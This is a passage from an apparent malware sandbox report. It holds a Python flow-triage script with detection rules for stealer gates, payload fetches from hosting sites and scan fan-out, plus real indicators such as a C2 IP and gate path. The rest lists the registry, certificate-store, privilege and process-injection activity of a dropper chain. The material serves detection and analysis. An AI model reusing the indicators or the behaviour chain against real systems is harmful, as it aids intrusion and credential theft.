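        if f.get("dport") == 53 and f["dst"] not in configured_dns:
            findings.append(("dns_to_unexpected_resolver", proc, f["dst"]))
        host = f.get("host", "")
        if host in HOSTING_ABUSED:
            findings.append(("legit_hosting_used", proc, host))
        if host in IP_LOOKUP:
            findings.append(("external_ip_lookup", proc, host))
        ua = f.get("user_agent", "")
        if ua.startswith(GO_UA_PREFIX):
            findings.append(("golang_default_ua", proc, ua))
        path = f.get("path", "")
        if STEALC_GATE_RE.match(path):
            findings.append(("stealc_style_gate", proc, f"{host or f['dst']}{path}"))
    for proc, ips in dests.items():
        if len(ips) >= fanout:
            findings.append(("scan_like_fanout", proc, f"{len(ips)} distinct hosts"))
    return findings


# Constructed records. Indicators come from this report; which process sent
# each flow is NOT in the report and is assigned here only for illustration.
SAMPLE_FLOWS = [
    {"process": "file.exe", "dst": "185.172.128.145", "dport": 80,
     "host": "185.172.128.145", "path": "/3cd2b41cbde8fc9c.php", "user_agent": "Mozilla/5.0"},
    {"process": "oHE5OfAE7uZo5wM5zxGSo2Yh.exe", "dst": "45.155.250.90", "dport": 53},
    {"process": "csrss.exe", "dst": "192.0.2.10", "dport": 443,
     "host": "raw.githubusercontent.com", "path": "/x/y/payload.bin", "user_agent": "Go-http-client/1.1"},
    {"process": "HIIEBAFCBK.exe", "dst": "198.51.100.20", "dport": 443, "host": "api.ipify.org", "path": "/"},
    {"process": "msedge.exe", "dst": "8.8.8.8", "dport": 53},  # benign control: configured resolver
] + [
    # The report's 4190-host burst is not attributed to a process; 150 SMB probes stand in for it.
    {"process": "unknown.exe", "dst": f"10.0.{i // 256}.{i % 256}", "dport": 445} for i in range(150)
]

if __name__ == "__main__":
    for rule, proc, detail in triage(SAMPLE_FLOWS):
        print(f"{rule:28} {proc:30} {detail}")
```

Fan-out is counted on distinct destination IPs per process rather than on flow count, because a single updater can open hundreds of flows to a handful of CDN nodes without being a scan; the threshold is a starting point to tune against your own baseline.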
Modifies data under HKEY_USERS 64 IoCs
All 64 writes are under \REGISTRY\USER\.DEFAULT\Software\ (paths below are relative to it). HKU\.DEFAULT is the hive loaded for processes running as LocalSystem, so oHE5OfAE7uZo5wM5zxGSo2Yh.exe, windefender.exe and these powershell.exe instances were running as SYSTEM. The MuiCache time-zone strings are side effects of enumerating time zones; the SystemCertificates keys are created by the certificate-store API the first time PowerShell opens the stores under this profile. The two LanguageList writes are the only non-certificate, non-time-zone entries.
description  ioc  Process
Set value (str)  Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time"  oHE5OfAE7uZo5wM5zxGSo2Yh.exe
Key created  Policies\Microsoft\SystemCertificates\CA  powershell.exe
Set value (str)  Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1661 = "Bahia Daylight Time"  windefender.exe
Key created  Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates  powershell.exe
Set value (str)  Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time"  oHE5OfAE7uZo5wM5zxGSo2Yh.exe
Set value (str)  Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time"  oHE5OfAE7uZo5wM5zxGSo2Yh.exe
Key created  Microsoft\SystemCertificates\TrustedPeople\CTLs  powershell.exe
Set value (str)  Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-661 = "Cen. Australia Daylight Time"  windefender.exe
Key created  Microsoft\SystemCertificates\CA\CRLs  powershell.exe
Key created  Microsoft\SystemCertificates\trust\Certificates  powershell.exe
Key created  Policies\Microsoft\SystemCertificates\Disallowed\CTLs  powershell.exe
Set value (int)  Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"  powershell.exe
Key created  Policies\Microsoft\SystemCertificates\CA\CTLs  powershell.exe
Key created  Microsoft\SystemCertificates\TrustedPeople  powershell.exe
Set value (str)  Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time"  oHE5OfAE7uZo5wM5zxGSo2Yh.exe
Key created  Microsoft\SystemCertificates\SmartCardRoot\Certificates  powershell.exe
Key created  Policies\Microsoft\SystemCertificates\CA\CRLs  powershell.exe
Key created  Policies\Microsoft\SystemCertificates\TrustedPeople  powershell.exe
Set value (str)  Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1502 = "Turkey Standard Time"  windefender.exe
Set value (data)  Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000  powershell.exe
Set value (str)  Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-365 = "Middle East Standard Time"  windefender.exe
Key created  Microsoft\SystemCertificates\Root  powershell.exe
Key created  Microsoft\SystemCertificates\Disallowed\Certificates  powershell.exe
Key created  Policies\Microsoft\SystemCertificates\CA\Certificates  powershell.exe
Set value (str)  Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time"  oHE5OfAE7uZo5wM5zxGSo2Yh.exe
Set value (str)  Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time"  oHE5OfAE7uZo5wM5zxGSo2Yh.exe
Key created  Policies\Microsoft\SystemCertificates\trust\CTLs  powershell.exe
Key created  Policies\Microsoft\SystemCertificates\CA\Certificates  powershell.exe
Key created  Policies\Microsoft\SystemCertificates\trust\CTLs  powershell.exe
Set value (str)  Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time"  oHE5OfAE7uZo5wM5zxGSo2Yh.exe
Set value (str)  Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time"  oHE5OfAE7uZo5wM5zxGSo2Yh.exe
Key created  Microsoft\SystemCertificates\Root\CTLs  powershell.exe
Key created  Policies\Microsoft\SystemCertificates\CA  powershell.exe
Set value (str)  Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-741 = "New Zealand Daylight Time"  windefender.exe
Set value (str)  Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-492 = "India Standard Time"  windefender.exe
Key created  Microsoft\SystemCertificates\trust\CRLs  powershell.exe
Set value (str)  Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time"  oHE5OfAE7uZo5wM5zxGSo2Yh.exe
Key created  Microsoft\SystemCertificates\CA\CRLs  powershell.exe
Key created  Policies\Microsoft\SystemCertificates\trust\CRLs  powershell.exe
Key created  Microsoft\SystemCertificates\Root\Certificates  powershell.exe
Set value (str)  Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time"  oHE5OfAE7uZo5wM5zxGSo2Yh.exe
Key created  Microsoft\SystemCertificates\Root\CTLs  powershell.exe
Set value (int)  Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"  powershell.exe
Set value (str)  Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time"  oHE5OfAE7uZo5wM5zxGSo2Yh.exe
Set value (str)  Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time"  oHE5OfAE7uZo5wM5zxGSo2Yh.exe
Key created  Policies\Microsoft\SystemCertificates\Disallowed\CTLs  powershell.exe
Key created  Policies\Microsoft\SystemCertificates\CA\Certificates  powershell.exe
Set value (str)  Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-571 = "China Daylight Time"  windefender.exe
Key created  Policies\Microsoft\SystemCertificates\Disallowed\CRLs  powershell.exe
Set value (str)  Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time"  oHE5OfAE7uZo5wM5zxGSo2Yh.exe
Key created  Policies\Microsoft\SystemCertificates\trust  powershell.exe
Key created  Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates  powershell.exe
Set value (str)  Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-672 = "AUS Eastern Standard Time"  windefender.exe
Set value (str)  Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-171 = "Central Daylight Time (Mexico)"  windefender.exe
Key created  Microsoft\SystemCertificates\TrustedPeople  powershell.exe
Key created  Microsoft\SystemCertificates\TrustedPeople\Certificates  powershell.exe
Set value (data)  Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000  0O4uZyUrqIFSEpTeH1H0rg8K.exe
Set value (str)  Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1472 = "Magadan Standard Time"  windefender.exe
Key created  Microsoft\SystemCertificates\CA  powershell.exe
Key created  Microsoft\SystemCertificates\CA  powershell.exe
Set value (str)  Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1862 = "Russia TZ 6 Standard Time"  windefender.exe
Key created  Microsoft\SystemCertificates\CA\CRLs  powershell.exe
Set value (str)  Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time"  oHE5OfAE7uZo5wM5zxGSo2Yh.exe
Key created  Microsoft\SystemCertificates\trust  powershell.exe
Modifies registry class 3 IoCs
description  ioc  Process
Key created  \REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000_Classes\Local Settings  taskmgr.exe
Key created  \REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000_Classes\Local Settings  OpenWith.exe
Key created  \REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000_Classes\Local Settings  firefox.exe
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 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 CkelNmqDwew6WPNzMTNOQeqx.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 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 CkelNmqDwew6WPNzMTNOQeqx.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 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 CkelNmqDwew6WPNzMTNOQeqx.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 file.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d090000000100000042000000304006082b06010505070302060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd67707390b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b660537f000000010000000e000000300c060a2b0601040182370a03047e000000010000000800000000c001b39667d60168000000010000000800000000409120d035d901030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d32313039333031343031313
55a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 file.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 CkelNmqDwew6WPNzMTNOQeqx.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 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 CkelNmqDwew6WPNzMTNOQeqx.exe -
NTFS ADS 1 IoCs
description   ioc                                                           Process
File created  C:\Users\Admin\Downloads\dnSpy-net-win64.zip:Zone.Identifier  firefox.exe
Opens file in notepad (likely ransom note) 1 IoCs
pid    Process
16572  NOTEPAD.EXE
Runs ping.exe 1 TTPs 2 IoCs
pid    Process
1852   PING.EXE
20644  PING.EXE
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 21880 aCVfJ427wn6CARWtL1GFkhK1.tmp 21880 aCVfJ427wn6CARWtL1GFkhK1.tmp 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 10796 powershell.exe 10796 powershell.exe 22124 taskmgr.exe 10796 powershell.exe 22124 taskmgr.exe 5968 syncUpd.exe 5968 syncUpd.exe 10796 powershell.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 688 oHE5OfAE7uZo5wM5zxGSo2Yh.exe 688 oHE5OfAE7uZo5wM5zxGSo2Yh.exe 22124 taskmgr.exe 22124 taskmgr.exe 19904 powershell.exe 19904 powershell.exe 19904 powershell.exe 22124 taskmgr.exe 19904 powershell.exe 22124 taskmgr.exe 19500 oHE5OfAE7uZo5wM5zxGSo2Yh.exe 19500 oHE5OfAE7uZo5wM5zxGSo2Yh.exe 19500 oHE5OfAE7uZo5wM5zxGSo2Yh.exe 19500 oHE5OfAE7uZo5wM5zxGSo2Yh.exe 19500 oHE5OfAE7uZo5wM5zxGSo2Yh.exe 19500 oHE5OfAE7uZo5wM5zxGSo2Yh.exe 19500 oHE5OfAE7uZo5wM5zxGSo2Yh.exe 19500 oHE5OfAE7uZo5wM5zxGSo2Yh.exe 19500 oHE5OfAE7uZo5wM5zxGSo2Yh.exe 19500 oHE5OfAE7uZo5wM5zxGSo2Yh.exe 22124 taskmgr.exe 6152 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid    Process
22124  taskmgr.exe
21000  OpenWith.exe
Suspicious use of AdjustPrivilegeToken 51 IoCs
description                          pid    Process
Token: SeDebugPrivilege              4044   file.exe
Token: SeDebugPrivilege              17004  taskmgr.exe
Token: SeSystemProfilePrivilege      17004  taskmgr.exe
Token: SeCreateGlobalPrivilege       17004  taskmgr.exe
Token: SeDebugPrivilege              22124  taskmgr.exe
Token: SeSystemProfilePrivilege      22124  taskmgr.exe
Token: SeCreateGlobalPrivilege       22124  taskmgr.exe
Token: 33                            17004  taskmgr.exe
Token: SeIncBasePriorityPrivilege    17004  taskmgr.exe
Token: SeDebugPrivilege              17632  jsc.exe
Token: SeDebugPrivilege              10796  powershell.exe
Token: SeDebugPrivilege              688    oHE5OfAE7uZo5wM5zxGSo2Yh.exe
Token: SeImpersonatePrivilege        688    oHE5OfAE7uZo5wM5zxGSo2Yh.exe
Token: SeDebugPrivilege              19904  powershell.exe
Token: SeDebugPrivilege              6152   powershell.exe
Token: SeDebugPrivilege              17488  powershell.exe
Token: SeDebugPrivilege              21576  powershell.exe
Token: SeDebugPrivilege              12156  powershell.exe
Token: SeDebugPrivilege              10676  powershell.exe
Token: SeSystemEnvironmentPrivilege  20712  csrss.exe
Token: SeSecurityPrivilege           9824   sc.exe
Token: SeSecurityPrivilege           9824   sc.exe
Token: SeDebugPrivilege              20248  HIIEBAFCBK.exe
Token: SeBackupPrivilege             6264   svchost.exe
Token: SeRestorePrivilege            6264   svchost.exe
Token: SeSecurityPrivilege           6264   svchost.exe
Token: SeTakeOwnershipPrivilege      6264   svchost.exe
Token: 35                            6264   svchost.exe
Token: SeDebugPrivilege              20592  HIIEBAFCBK.exe
Token: SeDebugPrivilege              22132  firefox.exe
Token: SeDebugPrivilege              22132  firefox.exe
Token: SeDebugPrivilege              4676   powershell.exe
Token: SeDebugPrivilege              6284   powershell.exe
Token: SeDebugPrivilege              8112   powershell.exe
Token: SeDebugPrivilege              9812   powershell.exe
Token: SeDebugPrivilege              10020  uU0jFy7gS9hEAPMIe43bhoBX.exe
Token: SeImpersonatePrivilege        10020  uU0jFy7gS9hEAPMIe43bhoBX.exe
Token: SeDebugPrivilege              7828   powershell.exe
Token: SeDebugPrivilege              22132  firefox.exe
Token: SeDebugPrivilege              22132  firefox.exe
Token: SeDebugPrivilege              22132  firefox.exe
Token: SeDebugPrivilege              22132  firefox.exe
Token: SeDebugPrivilege              2372   powershell.exe
Token: SeDebugPrivilege              4160   0O4uZyUrqIFSEpTeH1H0rg8K.exe
Token: SeImpersonatePrivilege        4160   0O4uZyUrqIFSEpTeH1H0rg8K.exe
Token: SeDebugPrivilege              5240   powershell.exe
Token: SeDebugPrivilege              22132  firefox.exe
Token: SeDebugPrivilege              5148   powershell.exe
Token: SeDebugPrivilege              9424   powershell.exe
Token: SeDebugPrivilege              22132  firefox.exe
Token: SeDebugPrivilege              22132  firefox.exe
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 21880 aCVfJ427wn6CARWtL1GFkhK1.tmp 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 17004 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe 22124 taskmgr.exe -
Suspicious use of SetWindowsHookEx 37 IoCs
pid Process 9488 BroomSetup.exe 21000 OpenWith.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 11600 BroomSetup.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe 22132 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description                          pid    Process                        procid_target
PID 17004 wrote to memory of 22124   17004  taskmgr.exe                    74
PID 17004 wrote to memory of 22124   17004  taskmgr.exe                    74
PID 4044 wrote to memory of 17632    4044   file.exe                       75
PID 4044 wrote to memory of 17632    4044   file.exe                       75
PID 4044 wrote to memory of 17632    4044   file.exe                       75
PID 4044 wrote to memory of 17632    4044   file.exe                       75
PID 4044 wrote to memory of 17632    4044   file.exe                       75
PID 4044 wrote to memory of 17632    4044   file.exe                       75
PID 4044 wrote to memory of 17632    4044   file.exe                       75
PID 4044 wrote to memory of 17632    4044   file.exe                       75
PID 17632 wrote to memory of 22060   17632  jsc.exe                        78
PID 17632 wrote to memory of 22060   17632  jsc.exe                        78
PID 17632 wrote to memory of 22060   17632  jsc.exe                        78
PID 22060 wrote to memory of 21880   22060  aCVfJ427wn6CARWtL1GFkhK1.exe   79
PID 22060 wrote to memory of 21880   22060  aCVfJ427wn6CARWtL1GFkhK1.exe   79
PID 22060 wrote to memory of 21880   22060  aCVfJ427wn6CARWtL1GFkhK1.exe   79
PID 21880 wrote to memory of 4320    21880  aCVfJ427wn6CARWtL1GFkhK1.tmp   80
PID 21880 wrote to memory of 4320    21880  aCVfJ427wn6CARWtL1GFkhK1.tmp   80
PID 21880 wrote to memory of 4320    21880  aCVfJ427wn6CARWtL1GFkhK1.tmp   80
PID 21880 wrote to memory of 2184    21880  aCVfJ427wn6CARWtL1GFkhK1.tmp   81
PID 21880 wrote to memory of 2184    21880  aCVfJ427wn6CARWtL1GFkhK1.tmp   81
PID 21880 wrote to memory of 2184    21880  aCVfJ427wn6CARWtL1GFkhK1.tmp   81
PID 17632 wrote to memory of 688     17632  jsc.exe                        82
PID 17632 wrote to memory of 688     17632  jsc.exe                        82
PID 17632 wrote to memory of 688     17632  jsc.exe                        82
PID 17632 wrote to memory of 3868    17632  jsc.exe                        83
PID 17632 wrote to memory of 3868    17632  jsc.exe                        83
PID 17632 wrote to memory of 3868    17632  jsc.exe                        83
PID 3868 wrote to memory of 5968     3868   ItyNfie1VMw2nLT7eTugtvYL.exe   84
PID 3868 wrote to memory of 5968     3868   ItyNfie1VMw2nLT7eTugtvYL.exe   84
PID 3868 wrote to memory of 5968     3868   ItyNfie1VMw2nLT7eTugtvYL.exe   84
PID 3868 wrote to memory of 9488     3868   ItyNfie1VMw2nLT7eTugtvYL.exe   86
PID 3868 wrote to memory of 9488     3868   ItyNfie1VMw2nLT7eTugtvYL.exe   86
PID 3868 wrote to memory of 9488     3868   ItyNfie1VMw2nLT7eTugtvYL.exe   86
PID 688 wrote to memory of 10796     688    oHE5OfAE7uZo5wM5zxGSo2Yh.exe   87
PID 688 wrote to memory of 10796     688    oHE5OfAE7uZo5wM5zxGSo2Yh.exe   87
PID 688 wrote to memory of 10796     688    oHE5OfAE7uZo5wM5zxGSo2Yh.exe   87
PID 9488 wrote to memory of 11988    9488   BroomSetup.exe                 89
PID 9488 wrote to memory of 11988    9488   BroomSetup.exe                 89
PID 9488 wrote to memory of 11988    9488   BroomSetup.exe                 89
PID 11988 wrote to memory of 2248    11988  cmd.exe                        91
PID 11988 wrote to memory of 2248    11988  cmd.exe                        91
PID 11988 wrote to memory of 2248    11988  cmd.exe                        91
PID 11988 wrote to memory of 5448    11988  cmd.exe                        92
PID 11988 wrote to memory of 5448    11988  cmd.exe                        92
PID 11988 wrote to memory of 5448    11988  cmd.exe                        92
PID 17632 wrote to memory of 12036   17632  jsc.exe                        93
PID 17632 wrote to memory of 12036   17632  jsc.exe                        93
PID 17632 wrote to memory of 12036   17632  jsc.exe                        93
PID 12036 wrote to memory of 13676   12036  CkelNmqDwew6WPNzMTNOQeqx.exe   94
PID 12036 wrote to memory of 13676   12036  CkelNmqDwew6WPNzMTNOQeqx.exe   94
PID 12036 wrote to memory of 13676   12036  CkelNmqDwew6WPNzMTNOQeqx.exe   94
PID 12036 wrote to memory of 14428   12036  CkelNmqDwew6WPNzMTNOQeqx.exe   95
PID 12036 wrote to memory of 14428   12036  CkelNmqDwew6WPNzMTNOQeqx.exe   95
PID 12036 wrote to memory of 14428   12036  CkelNmqDwew6WPNzMTNOQeqx.exe   95
PID 12036 wrote to memory of 14960   12036  CkelNmqDwew6WPNzMTNOQeqx.exe   96
PID 12036 wrote to memory of 14960   12036  CkelNmqDwew6WPNzMTNOQeqx.exe   96
PID 12036 wrote to memory of 14960   12036  CkelNmqDwew6WPNzMTNOQeqx.exe   96
PID 14960 wrote to memory of 15204   14960  CkelNmqDwew6WPNzMTNOQeqx.exe   97
PID 14960 wrote to memory of 15204   14960  CkelNmqDwew6WPNzMTNOQeqx.exe   97
PID 14960 wrote to memory of 15204   14960  CkelNmqDwew6WPNzMTNOQeqx.exe   97
PID 19500 wrote to memory of 19904   19500  oHE5OfAE7uZo5wM5zxGSo2Yh.exe   101
PID 19500 wrote to memory of 19904   19500  oHE5OfAE7uZo5wM5zxGSo2Yh.exe   101
PID 19500 wrote to memory of 19904   19500  oHE5OfAE7uZo5wM5zxGSo2Yh.exe   101
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes

C:\Users\Admin\AppData\Local\Temp\file.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\file.exe"
  - Suspicious use of SetThreadContext
  - Modifies system certificate store
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4044
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
      cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
      - Drops startup file
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID:17632
        C:\Users\Admin\Pictures\aCVfJ427wn6CARWtL1GFkhK1.exe
          cmdline: "C:\Users\Admin\Pictures\aCVfJ427wn6CARWtL1GFkhK1.exe"
          - Executes dropped EXE
          - Suspicious use of WriteProcessMemory
          PID:22060
            C:\Users\Admin\AppData\Local\Temp\is-RGDCL.tmp\aCVfJ427wn6CARWtL1GFkhK1.tmp
